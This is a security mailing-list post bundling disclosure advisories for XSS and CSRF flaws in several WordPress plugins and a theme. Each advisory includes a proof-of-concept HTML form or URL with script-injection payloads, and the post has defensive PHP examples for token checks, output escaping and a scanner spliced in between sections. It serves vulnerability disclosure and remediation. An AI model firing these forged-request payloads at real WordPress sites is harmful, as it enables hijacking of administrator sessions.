Date: Wed, 1 Mar 2017 07:16:47 +0100
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple Cross-Site Scripting vulnerabilities affecting various
 WordPress Plugins

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.


------------------------------------------------------------------------
Admin Custom Login WordPress plugin affected by persistent Cross-Site
Scripting via Logo URL field
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting vulnerability has been encountered in
the Admin Custom Login WordPress plugin. This issue allows an attacker
to perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. The
"logo_url" field does not validate <script> tags and does not perform
output encoding. 

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Admin Custom Login [2]
WordPress plugin version 2.4.5.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Admin Custom Login plugin lets you customize your WordPress admin
login page to your liking.

The plugin allows you to change the background color, background image,
background slide show, login form color, login form font size, login
form position, add social media icons to the form, and many more
features.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
As an admin, it's possible to upload a logo on the login page. The
"logo_url" field does not validate <script> tags and does not perform
output encoding. 

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=admin_custom_login"
method="POST">
			<input type="hidden" name="Action" value="logoSave"/>
			<input type="hidden" name="logo_image"
value="http://<target>/wp-content/uploads/2016/06/scriptalert1script.jpeg"/>
			<input type="hidden" name="logo_width" value="200"/>
			<input type="hidden" name="logo_height" value="60"/>
			<input type="hidden" name="logo_url"
value="&quot;><script>alert(1)</script>"/>
			<input type="hidden" name="logo_url_title" value="\\\\"/>
			<input type="submit"/>
		</form>
	</body>
</html>


After this request is executed, re-open the admin panel of WordPress and
visit the Admin Custom Login page.

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/admin_custom_login_wordpress_plugin_affected_by_persistent_cross_site_scripting_via_logo_url_field.html
[2] https://wordpress.org/plugins/admin-custom-login/
------------------------------------------------------------------------
Admin Custom Login WordPress plugin custom login page affected by
persistent Cross-Site Scripting
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting vulnerability has been encountered in
the Admin Custom Login WordPress plugin. This issue allows an attacker
to perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. The
plugin has an option to add custom styles to the WordPress login page.
By simply closing the </style> tag, it is possible to insert a malicious
script, which will then be executed on the login page.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Admin Custom Login [2]
WordPress plugin version 2.4.5.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Admin Custom Login plugin lets you customize your WordPress admin
login page to your liking.

The plugin allows you to change the background color, background image,
background slide show, login form color, login form font size, login
form position, add social media icons to the form, and many more
features.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
As an Admin, it is possible to place XSS on the login page, but more
interesting is the lack of CSRF protection: if a logged-in admin can be
tricked into opening a page containing the code below, the XSS payload
is added to the login page.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=admin_custom_login"
method="POST">
			<input type="hidden" name="Action" value="loginbgSave" />
			<input type="hidden" name="login_form_position" value="default" />
			<input type="hidden" name="Login_bg_value" value="undefined" />
			<input type="hidden" name="login_background_color" value="" />
			<input type="hidden" name="login_bg_color_overlay" value="undefined"
/>
			<input type="hidden" name="login_bg_image" value="" />
			<input type="hidden" name="login_form_opacity" value="10" />
			<input type="hidden" name="login_form_width" value="300" />
			<input type="hidden" name="login_form_radius" value="3" />
			<input type="hidden" name="login_border_style" value="undefined" />
			<input type="hidden" name="login_border_thikness" value="3" />
			<input type="hidden" name="login_border_color" value="" />
			<input type="hidden" name="login_bg_repeat" value="undefined" />
			<input type="hidden" name="login_bg_position" value="undefined" />
			<input type="hidden" name="login_enable_shadow" value="no" />
			<input type="hidden" name="login_shadow_color" value="" />
			<input type="hidden" name="login_custom_css"
value="<h1>test</h2></style><script>alert(5)</script>" />
			<input type="hidden" name="login_form_left" value="700" />
			<input type="hidden" name="login_form_top" value="300" />
			<input type="hidden" name="login_form_float" value="center" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/admin_custom_login_wordpress_plugin_custom_login_page_affected_by_persistent_cross_site_scripting.html
[2] https://wordpress.org/plugins/admin-custom-login/
------------------------------------------------------------------------
Cross-Site Request Forgery & Cross-Site Scripting in Contact Form
Manager WordPress Plugin
------------------------------------------------------------------------
Edwin Molenaar [2], July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that Contact Form Manager does not protect against
Cross-Site Request Forgery. This allows an attacker to change arbitrary
Contact Form Manager settings. In addition, the plugin also fails to
apply proper output encoding, rendering it vulnerable to stored
Cross-Site Scripting.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160718-0003

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
These issues were successfully tested on Contact Form Manager [3]
WordPress Plugin version 

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Contact Form Manager [3] WordPress Plugin lets users create and
manage multiple customized contact forms for their website. It supports
a wide range of contact form elements such as text field, email field,
textarea, dropdown list, radio button, checkbox, date picker, captcha,
and file uploader. It was discovered that Contact Form Manager does not
protect against Cross-Site Request Forgery. This allows an attacker to
change arbitrary Contact Form Manager settings. In addition, the plugin
also fails to apply proper output encoding, rendering it vulnerable to
stored Cross-Site Scripting.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
These issues exist because the plugin lacks an anti-CSRF token, and
because the $_POST parameters are not properly filtered or
output-encoded. The issues are present in the files
contact-form-manager/admin/add_smtp.php and
contact-form-manager/admin/form-edit.php.

The username input field on the XYZ Contact > SMTP Settings page is
vulnerable to Cross-Site Scripting, as well as the Contact Form Name
input field on the XYZ Contact > Contact Form page.

SMTP Settings URL:
http://<target>/wp-admin/admin.php?page=contact-form-manager-manage-smtp

Contact Forms URL:
http://<target>/wp-admin/admin.php?page=contact-form-manager-managecontactformsp
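The check that this advisory (and the Admin Custom Login and Alpine PhotoTile advisories in this mail) reports as missing, written out as an added example in plain PHP. This is not code from Contact Form Manager or any other plugin on this page: the function names, the per-session secret and the HMAC token scheme are this example's own stand-in for WordPress nonces (wp_nonce_field() / check_admin_referer()), and only the xyz_cfm_* field names are taken from the proof of concept above. It runs from the command line with a simulated forged request and a simulated legitimate one.

```php
<?php
// Added example, not code from Contact Form Manager or any other project on
// this page. Shows the two checks a settings handler needs: a capability
// check and an anti-CSRF token bound to the action. Names are hypothetical;
// in WordPress the token is wp_nonce_field('cfm_save_smtp', 'cfm_nonce') on
// the form and check_admin_referer('cfm_save_smtp', 'cfm_nonce') in the handler.

declare(strict_types=1);

const TOKEN_FIELD  = 'cfm_nonce';
const TOKEN_ACTION = 'cfm_save_smtp';

// Token derived from a per-session secret the attacker's page cannot read.
// (WordPress derives its nonce from the user id, session token and a site
// salt instead of a random session value; the property is the same.)
function issue_token(string $session_secret, string $action): string
{
    return hash_hmac('sha256', $action, $session_secret);
}

// Hidden field for the plugin's own form. The token is hex, but every
// attribute value gets escaped regardless.
function token_field(string $session_secret): string
{
    $token = issue_token($session_secret, TOKEN_ACTION);
    return sprintf('<input type="hidden" name="%s" value="%s" />',
        TOKEN_FIELD, htmlspecialchars($token, ENT_QUOTES, 'UTF-8'));
}

/**
 * Settings handler. $post stands in for $_POST and $can_manage for
 * current_user_can('manage_options'). Returns the validated settings on
 * success and throws on a forged or unauthorised request, so the caller
 * fails closed (check_admin_referer() does this by calling wp_die()).
 */
function handle_smtp_save(array $post, bool $can_manage, string $session_secret): array
{
    if (!$can_manage) {
        throw new RuntimeException('insufficient capability');
    }
    $supplied = (string) ($post[TOKEN_FIELD] ?? '');
    $expected = issue_token($session_secret, TOKEN_ACTION);
    // hash_equals() compares in constant time and never coerces types.
    if ($supplied === '' || !hash_equals($expected, $supplied)) {
        throw new RuntimeException('missing or invalid anti-CSRF token');
    }
    // Validate before storing: a host name is never markup, so the stored
    // value cannot later become a stored XSS sink.
    $host = trim((string) ($post['xyz_cfm_SmtpHostName'] ?? ''));
    if (!preg_match('/^[A-Za-z0-9.-]{1,253}$/', $host)) {
        throw new InvalidArgumentException('invalid SMTP host name');
    }
    $port = filter_var($post['xyz_cfm_SmtpPortNumber'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 65535]]);
    if ($port === false) {
        throw new InvalidArgumentException('invalid SMTP port');
    }
    return ['host' => $host, 'port' => $port];
}

// Constructed sample requests.
$secret = bin2hex(random_bytes(32));   // would live in the user's session
echo token_field($secret), PHP_EOL;

// 1. A cross-site POST like the proof of concept: the attacker's page
//    cannot obtain the victim's token, so the request carries none.
$forged = ['xyz_cfm_SmtpHostName' => '<svg onload=alert(document.domain)>',
           'xyz_cfm_SmtpPortNumber' => '25'];
try {
    handle_smtp_save($forged, true, $secret);
} catch (RuntimeException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// 2. A legitimate submission from the plugin's own settings form.
$legit = ['xyz_cfm_SmtpHostName' => 'smtp.example.net',
          'xyz_cfm_SmtpPortNumber' => '587',
          TOKEN_FIELD => issue_token($secret, TOKEN_ACTION)];
print_r(handle_smtp_save($legit, true, $secret));
```

The token check runs before any validation or storage, so a forged request never reaches the code that writes options; the capability check comes first because a nonce only proves intent, not authorisation.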

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form id="f1" method="POST"
action="http://<target>/wp-admin/admin.php?page=contact-form-manager-manage-smtp&action=add-smtp">
			<table>
				<tr><td>xyz_cfm_SmtpAuthentication<td><input
name="xyz_cfm_SmtpAuthentication" value="true" size="100"></tr>
				<tr><td>xyz_cfm_SmtpEmailAddress<td><input
name="xyz_cfm_SmtpEmailAddress" value="<svg
onload=alert(document.domain)>" size="100"></tr>
				<tr><td>xyz_cfm_SmtpHostName<td><input name="xyz_cfm_SmtpHostName"
value="<svg onload=alert(document.domain)>" size="100"></tr>
				<tr><td>xyz_cfm_SmtpPassword<td><input name="xyz_cfm_SmtpPassword"
value="<svg onload=alert(document.domain)>" size="100"></tr>
				<tr><td>xyz_cfm_SmtpPortNumber<td><input
name="xyz_cfm_SmtpPortNumber" value="25" size="100"></tr>
				<tr><td>xyz_cfm_SmtpSecuirity<td><input name="xyz_cfm_SmtpSecuirity"
value="notls" size="100"></tr>
			</table>
		</form>
		<button
onclick="document.getElementById('f1').submit()">Submit</button>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_request_forgery___cross_site_scripting_in_contact_form_manager_wordpress_plugin.html
[2] https://www.linkedin.com/in/edwinmolenaar
[3] https://wordpress.org/plugins/contact-form-manager/
------------------------------------------------------------------------
Cross-Site Scripting in Alpine PhotoTile for Instagram WordPress Plugin
------------------------------------------------------------------------
Antonis Manaras, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Alpine PhotoTile
for Instagram WordPress Plugin. This issue allows an attacker to perform
a wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160725-0010

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Alpine PhotoTile for Instagram [2]
WordPress Plugin version 1.2.7.7.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Alpine PhotoTile for Instagram [2] is a simple, stylish, and compact
plugin for displaying Instagram photos in a sidebar, post, or page. A
Cross-Site Scripting vulnerability was found in the Alpine PhotoTile for
Instagram WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
A reflected Cross-Site Scripting vulnerability exists in the Alpine
PhotoTile for Instagram WordPress plugin. This vulnerability allows an
attacker to perform any action with the privileges of the admin user.
The affected code is not protected with an anti-Cross-Site Request
Forgery token. Consequently, it can be exploited by luring the target
user into clicking a specially crafted link or visiting a malicious
website (or advertisement).

The vulnerability exists in the
alpine-photo-tile-for-instagram/gears/alpinebot-admin.php file on line
887:

	+ '&client_id=<?php echo $_POST['client_id']; ?>'

The vulnerability can be exploited using a specially crafted URL
parameter. In order to exploit this issue, the target user must click a
specially crafted link or visit a malicious website (or advertisement).

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=alpine-photo-tile-for-instagram-settings&tab=add"
method="POST">
			<input type="hidden" name="hidden" value="Y" />
			<input type="hidden" name="add&#45;user" value="Y" />
			<input type="hidden" name="client&#95;id"
value="&lt;&#47;script&gt;&lt;img&#32;src&#61;x&#32;onerror&#61;alert&#40;1&#41;&#32;&#47;&gt;"
/>
			<input type="hidden" name="client&#95;secret" value="bar" />
			<input type="hidden"
name="alpine&#45;photo&#45;tile&#45;for&#45;instagram&#45;settings&#95;add&#91;submit&#45;add&#93;"
value="Add&#32;and&#32;Authorize&#32;New&#32;User" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_alpine_phototile_for_instagram_wordpress_plugin.html
[2] https://wordpress.org/plugins/alpine-photo-tile-for-instagram/
------------------------------------------------------------------------
Cross-Site Scripting in Atahualpa WordPress Theme
------------------------------------------------------------------------
Spyros Gasteratos, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A number of Cross-Site Scripting vulnerabilities were found in the
Atahualpa WordPress Theme. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to use the CSRF vulnerability
described in SFY20160759 [2] to trick the admin into storing malicious
input.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0004

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Atahualpa [3] WordPress Theme.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Atahualpa v3.7.24 has its own theme Options page where administrators
can tweak many settings, including feed links, comments, website
appearance, et cetera. Internally, the settings submission is handled by
forms submitting a number of POST requests. However, when the settings
are auto-filled back into the form, the input is not escaped in many
places; instead it is echoed back to the user unmodified. Atahualpa's
settings allow customisation of various fields such as comments, feed
links, et cetera.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Providing any of the following fields with a string such as
"><script>alert(1);</script> results in the script element being
appended after the respective input element when the form is rendered
back by the server:

"comment_feed_link",
"home_cat_menu_bar",
"email_subscribe_link",
"home_single_next_prev",
"email_subscribe_link_title",
"feedburner_email_id",
"excerpt_length",
"page_menu_bar_link_color",
"cat_menu_bar_background_color_parent",
"cat_menu_bar_link_color",
"left_col_pages_exclude",
"widget_lists link-hover-color",
"left_col2_cats_exclude"

The solution to this issue is to encode as html all the user-provided
parameters before they are returned to the browser.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
In order to reproduce the issue, the following request can be replayed
using the cookies of the current admin.

<html>
	<body>
		<form
action="https://play.sfy.nl/wp-admin/themes.php?page=atahualpa-options"
method="POST">
			<input type="hidden" name="widget_container" value="margin: 0 0 15px
0;"/>
			<input type="hidden" name="widget_title_box" value=""/>
			<input type="hidden" name="widget_title" value="font-size:
1.6em;&#13;font-weight: bold;"/>
			<input type="hidden" name="widget_content" value=""/>
			<input type="hidden" name="widget_lists[li-margin-left]" value="0"/>
			<input type="hidden" name="widget_lists[link-border-left-width]"
value="7"/>
			<input type="hidden" name="widget_lists[link-border-left-color]"
value="CCCCCC"/>
			<input type="hidden"
name="widget_lists[link-border-left-hover-color]" value="000000"/>
			<input type="hidden" name="widget_lists[link-padding-left]"
value="5"/>
			<input type="hidden" name="widget_lists[link-weight]"
value="normal"/>
			<input type="hidden" name="widget_lists[link-color]" value="666666"/>
			<input type="hidden" name="widget_lists[link-hover-color]"
value="000000"/>
			<input type="hidden" name="widget_lists2[li-margin-left]" value="5"/>
			<input type="hidden" name="widget_lists2[link-border-left-width]"
value="7"/>
			<input type="hidden" name="widget_lists2[link-border-left-color]"
value="CCCCCC"/>
			<input type="hidden"
name="widget_lists2[link-border-left-hover-color]" value="000000"/>
			<input type="hidden" name="widget_lists2[link-padding-left]"
value="5"/>
			<input type="hidden" name="widget_lists2[link-weight]"
value="normal"/>
			<input type="hidden" name="widget_lists2[link-color]"
value="666666"/>
			<input type="hidden" name="widget_lists2[link-hover-color]"
value="000000"/>
			<input type="hidden" name="widget_lists3[li-margin-left]" value="5"/>
			<input type="hidden" name="widget_lists3[link-border-left-width]"
value="7"/>
			<input type="hidden" name="widget_lists3[link-border-left-color]"
value="CCCCCCw66ar&quot;><script>alert(1)</script>ljgl1"/>
			<input type="hidden"
name="widget_lists3[link-border-left-hover-color]" value="000000"/>
			<input type="hidden" name="widget_lists3[link-padding-left]"
value="5"/>
			<input type="hidden" name="widget_lists3[link-weight]"
value="normal"/>
			<input type="hidden" name="widget_lists3[link-color]"
value="666666"/>
			<input type="hidden" name="widget_lists3[link-hover-color]"
value="000000"/>
			<input type="hidden" name="category_widget_display_type"
value="inline"/>
			<input type="hidden" name="select_font_size" value="Default"/>
			<input type="hidden" name="save" value=""/>
			<input type="hidden" name="action" value="save"/>
			<input type="hidden" name="category" value="widgets"/>
			<input type="submit"/>
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_atahualpa_wordpress_theme.html
[2] https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_atahualpa_wordpress_theme.html
[3] https://wordpress.org/themes/atahualpa/
------------------------------------------------------------------------
Cross-Site Scripting in Google Analytics Dashboard WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Google Analytics
Dashboard WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0026

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Google Analytics Dashboard [2]
WordPress Plugin version 2.1.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Google Analytics Dashboard [2] WordPress Plugin gives access to your
Google Analytics data directly inside your WordPress blog. A Cross-Site
Scripting vulnerability was found in the Google Analytics Dashboard
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
This issue exists in the file gad-admin-options-ui.php and is caused due
to the lack of output encoding on the ga_email option/request parameter.

<tr valign="top">
	<th scope="row">
		<label for="ga_email"><?php _e( 'Google Analytics Email',
'google-analytics-dashboard' ); ?></label></th>
	<td>
		<input name="ga_email" type="text" size="15" id="ga_email"
class="regular-text" value="<?php echo isset( $_POST['ga_email'] ) ?
$_POST['ga_email'] : get_option( 'gad_login_email' ); ?>" />
	</td>
</tr>

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious website.
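The fix the Atahualpa advisory recommends (HTML-encode user-provided values before they are echoed back), carried through as an added example in plain PHP. This is not code from Google Analytics Dashboard, Atahualpa, Admin Custom Login or any other project on this page; the function names are this example's own and the WordPress equivalents are named in the comments. It covers the two output contexts these advisories hit: an attribute value echoed straight from $_POST or from a stored option, as in the gad-admin-options-ui.php snippet above, and the body of the <style> element that Admin Custom Login's login_custom_css value is written into, where entity encoding is the wrong tool.

```php
<?php
// Added example, not code from any plugin on this page. Function names are
// hypothetical; WordPress equivalents are noted per function.

declare(strict_types=1);

// Attribute context. ENT_QUOTES encodes both " and ', so a payload such as
// "><script> can neither terminate the attribute nor the tag.
// WordPress: esc_attr().
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// The same input element the vulnerable template builds, with the value
// encoded instead of echoed raw.
function render_input(string $name, string $stored_value): string
{
    return sprintf('<input name="%s" type="text" value="%s" />',
        attr($name), attr($stored_value));
}

// <style> context. Entity encoding does not help here: the browser does not
// decode character references inside <style>, so "&lt;/style&gt;" is merely
// broken CSS, while a literal "</style>" ends the element and everything
// after it is parsed as HTML again. The HTML tokenizer leaves the raw-text
// state only on "</" followed by the tag name, so refusing any "</" before
// the value is stored is sufficient. WordPress has no CSS-specific escaper;
// wp_strip_all_tags() is the usual stand-in, but rejecting the value lets
// the administrator see why it was not saved.
function render_custom_css(string $css): string
{
    if (strpos($css, '</') !== false) {
        throw new InvalidArgumentException('custom CSS must not contain "</"');
    }
    return "<style type=\"text/css\">\n" . $css . "\n</style>";
}

// Constructed sample inputs: the payloads quoted in the advisories above,
// plus a benign value for each context, so the output can be compared.
$attribute_samples = [
    '"><script>alert(1)</script>',          // Admin Custom Login logo_url, GAD ga_email
    '<svg onload=alert(document.domain)>',  // Contact Form Manager SMTP fields
    'CCCCCC',                               // a legitimate Atahualpa colour value
];
foreach ($attribute_samples as $value) {
    echo render_input('ga_email', $value), PHP_EOL;
}

$css_samples = [
    '<h1>test</h2></style><script>alert(5)</script>',  // Admin Custom Login login_custom_css
    '#loginform { background: #ffffff; }',             // legitimate custom CSS
];
foreach ($css_samples as $css) {
    try {
        echo render_custom_css($css), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

Encoding is chosen per context, not per value: the same string is safe inside a quoted attribute once encoded, but no HTML encoding makes it safe inside <style>, which is why the custom-CSS path validates on input rather than encoding on output.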

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/options-general.php?page=google-analytics-dashboard%2Fgad-admin-options.php"
method="POST">
			<input type="hidden" name="gad&#95;login&#95;type" value="client" />
			<input type="hidden" name="ga&#95;email"
value="&quot;><script>alert(1);</script>" />
			<input type="hidden" name="ga&#95;pass" value="password" />
			<input type="hidden" name="ga&#95;save&#95;pass"
value="ga&#95;save&#95;pass" />
			<input type="hidden" name="SubmitLogin" value="Login&#32;?&#187;" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_google_analytics_dashboard_wordpress_plugin.html
[2] https://wordpress.org/plugins/google-analytics-dashboard/
------------------------------------------------------------------------
Cross-Site Scripting in Magic Fields 1 WordPress Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A reflected Cross-Site Scripting vulnerability has been encountered in
the Magic Fields 1 WordPress plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0019

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Magic Fields 1 [2] version 1.7.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is addressed in the 1.7.2 [3] version of Magic Fields 1. You
can obtain the most recent version on the following location:
https://github.com/hunk/Magic-Fields/releases [4]

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
Magic Fields is a WordPress plugin that allows for easy creation of
custom fields for the various post types in WordPress. A reflected
Cross-Site Scripting vulnerability was found in Magic Fields that allows
an attacker to perform a wide variety of actions, such as stealing
administrators' session tokens, or performing arbitrary actions on their
behalf. To exploit this issue an attacker needs to lure a user with
administrator privileges to a page controlled by the attacker or trick
them into clicking a malicious link.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Cross-Site Scripting (XSS) attacks are a type of injection, in which
malicious scripts are injected into otherwise benign and trusted
websites. XSS attacks occur when an attacker uses a web application to
send malicious code, generally in the form of a browser script, to a
different end user. Flaws that allow these attacks to succeed are quite
widespread and occur when a web application uses input from a user
without validating or encoding it. Reflected XSS occurs when user input
is immediately returned by a web application in an error message, search
result, or any other response that includes some or all of the input
provided by the user as part of the request.

The plugin has several instances where XSS is possible due to lacking
output encoding and user input sanitization:

1. The custom-write-panel-id field does not validate <script> tags and
   does not perform output encoding. Proof of concept code that
   demonstrates this issue is listed in the proof of concept section.

2. The value of the custom-group-id parameter in the
   RCCWP_CreateCustomFieldPage.php file is insufficiently validated:

   53: echo $_GET['custom-group-id'];

3. The value of the custom-field-css parameter in the
   RCCWP_CreateCustomFieldPage.php file is insufficiently validated:

   53: echo $_POST['custom-field-css'];
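The two echo statements above, the client_id echo on line 887 of Alpine PhotoTile and the ga_email ternary in Google Analytics Dashboard all share one shape: a request superglobal written to the response with no escaping call in the same statement. As an added example that is not code from any project on this page, here is a small triage check built on PHP's own tokenizer that flags that shape. The allow-list of escaper names and the cut-off rule (any allow-listed call anywhere in the statement silences it) are this example's own heuristics, not a taint analysis, so its output is a list to review rather than a verdict; the sample source it scans is constructed from the lines quoted in the advisories.

```php
<?php
// Added example, not code from any plugin on this page. Flags echo/print
// statements that reference a request superglobal without any allow-listed
// escaper in the same statement. Heuristic only: false negatives are
// possible when an escaper wraps a different argument than the tainted one.

declare(strict_types=1);

const TAINTED_VARS = ['$_GET', '$_POST', '$_REQUEST', '$_COOKIE', '$_SERVER'];
// Calls treated as neutralising for HTML output; extend per project.
const ESCAPERS = ['esc_attr', 'esc_html', 'esc_url', 'esc_js', 'esc_textarea',
    'htmlspecialchars', 'htmlentities', 'intval', 'absint', 'rawurlencode',
    'wp_kses', 'wp_kses_post', 'json_encode'];

/**
 * Returns one entry per suspicious statement: ['line' => int, 'code' => string].
 */
function find_unescaped_echoes(string $source): array
{
    $findings = [];
    $tokens = token_get_all($source);
    $count = count($tokens);
    for ($i = 0; $i < $count; $i++) {
        $tok = $tokens[$i];
        // echo, print and the short echo tag all open an output statement.
        if (!is_array($tok) || !in_array($tok[0], [T_ECHO, T_PRINT, T_OPEN_TAG_WITH_ECHO], true)) {
            continue;
        }
        $tainted = false;
        $escaped = false;
        $code = '';
        // Walk to the end of the statement: ';' or a closing tag, which
        // implies the semicolon.
        for ($j = $i + 1; $j < $count; $j++) {
            $t = $tokens[$j];
            if ($t === ';' || (is_array($t) && $t[0] === T_CLOSE_TAG)) {
                break;
            }
            $code .= is_array($t) ? $t[1] : $t;
            if (!is_array($t)) {
                continue;
            }
            if ($t[0] === T_VARIABLE && in_array($t[1], TAINTED_VARS, true)) {
                $tainted = true;
            } elseif ($t[0] === T_STRING && in_array(strtolower($t[1]), ESCAPERS, true)) {
                $escaped = true;
            } elseif (in_array($t[0], [T_INT_CAST, T_DOUBLE_CAST, T_BOOL_CAST], true)) {
                $escaped = true;   // numeric casts cannot carry markup
            }
        }
        if ($tainted && !$escaped) {
            $findings[] = [
                'line' => $tok[2],
                'code' => trim($tok[1]) . ' ' . trim(preg_replace('/\s+/', ' ', $code)),
            ];
        }
        $i = $j;
    }
    return $findings;
}

// Constructed sample: the vulnerable lines quoted in the advisories above,
// followed by two lines that would pass review.
$sample = <<<'PHP'
<?php
echo $_GET['custom-group-id'];
echo $_POST['custom-field-css'];
?>
<input name="ga_email" value="<?php echo isset( $_POST['ga_email'] ) ? $_POST['ga_email'] : get_option( 'gad_login_email' ); ?>" />
<input name="ga_email" value="<?php echo esc_attr( $_POST['ga_email'] ); ?>" />
<?php echo (int) $_GET['page_id']; ?>
PHP;

foreach (find_unescaped_echoes($sample) as $finding) {
    printf("line %d: %s\n", $finding['line'], $finding['code']);
}
```

Run against the constructed sample it reports the three raw echoes (sample lines 2, 3 and 5) and stays quiet on the esc_attr() and (int) lines; pointing it at a plugin's admin/ directory with file_get_contents() per file gives a first pass before manual review.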

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
Proof of concept code that demonstrates the Cross-Site Scripting in the
custom-write-panel-id field is listed below: 
http://<targetsite>/wp-admin/admin.php?page=MagicFieldsMenu&custom-write-panel-id=1"
/><script>alert(1)</script>&mf_action=finish-create-custom-field

